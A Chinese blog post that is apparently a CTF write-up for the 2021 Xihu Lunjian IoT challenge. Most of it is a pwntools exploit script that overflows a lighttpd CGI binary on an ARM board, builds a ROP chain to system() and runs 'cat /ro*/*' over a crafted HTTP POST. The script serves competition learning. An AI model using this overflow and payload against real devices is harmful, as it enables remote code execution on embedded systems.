MENU

西湖论剑 2021 IOT Writeup / 复现

March 16, 2022 • Read: 348 • Pwn,CTF

这次比赛拿了三等,呜呜呜,都是龙哥在输出,在比赛将要结束的时候做出了一题单点 IOT,个人觉得问题主要在于不够熟悉板子上,在连接板子上就花费了大量的时间和精力,直至比赛结束也没能拿到板子的 Shell。

因为杭州萧山疫情的原因,无法返校,需要在家里隔离 14 天,借此机会,尝试着玩玩这块板子,复现一下当时的赛题,希望明年能够再接再厉。

题目的链接和官方 Writeup 可以看 https://github.com/DasSecurity-HatLab/IoT-CTF-2021
这几天在准备一些虎符PKS的东西,可能这部分内容要晚一些更新。

Writeup

lightttpd

from pwn import *
#from Crypto.Util.number import *
#context.log_level = "debug"
context.binary = "./55.cgi"
exit_addr = 0x00010D14
add_sp = 0x000108b8


bss_addr = 0x00022088
puts_addr = 0x00010708
fread_addr = 0x000106F0
pop_r3_addr = 0x0001066c
mov_r0_r7 = 0x00010ec4
pop_fp_addr = 0x00010998
system_addr = 0x10720
show_leak_addr = 0x00010D0C
ROP_chain = [
    0,  # r4
    0,  # r5
    0,  # r6
    0x00022088,  # r7
    0,  # r8
    system_addr,
]
print hex(len(flat(ROP_chain)))
query = "*#$^" + '\xFF' * 3 + '\xFF\xFF'
query = query.ljust(0x200, 'x')
query += flat(ROP_chain).ljust(0x9E, 'p')
#query = query.ljust(0x2FD - 0x4D, 'a')

x = "cat /ro*/*;"
x += 'a' * ((0x2f4 - len(x)))
x = x[:0x2f4]
query += 'b' * 0x12 + x + 'c' * 4 + p32(add_sp)
DEBUG = 0
if DEBUG:
    env = {
        "HTTP_COOKIES": "[email protected]!!!",
        "REQUEST_METHOD" : "POST",
        "CONTENT_TYPE" : "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(query))
    }

    sh = process(["qemu-arm", "-g", "1234", "-L", "/usr/arm-linux-gnueabi/", "55.cgi"], env=env)
    sh.send(query)
    # sh.send(payload)
    sh.interactive()
else:
    sh = remote('114.5.32.22', 80)
    data = '''POST /cgi-bin/55.cgi HTTP/1.1
Host: 114.5.32.22
Cookies: [email protected]!!!
Content-Length: {}
Content-Type: application/x-www-form-urlencoded

{}'''.replace('\n', '\r\n').format(len(query), query)

    sh.send(data)
    sh.interactive()

# sh.send(query)
# # payload = p32(exit_addr) * 0xEE + p32(0x00010D0C)
# # query = "*#$^" + '\xFF' * 3 + '\xFF' + '\xF7'
# # filp_size = 0x2FD + 4 - 0x4D - len(payload)
# # all_data = ('a' * 5 + p32(0x00010D0C) * ((filp_size / 4) - 3)).ljust(0x2FD - 0x4D - 5, 'a')
#
# #[email protected]!!!

#sh.recvuntil('\r\n\r\n')
#data = sh.recvuntil("No Authentication", drop=True)
#print long_to_bytes(int(data, 16))[::-1]
# sh.interactive()

现场图片

03110055_w8348.jpg
0D9A0648_w3446.jpg
0D9A1292_w5950.jpg

Last Modified: March 23, 2022
Archives QR Code
QR Code for this page
Tipping QR Code
Leave a Comment

已有 1 条评论
  1. 王师傅太强了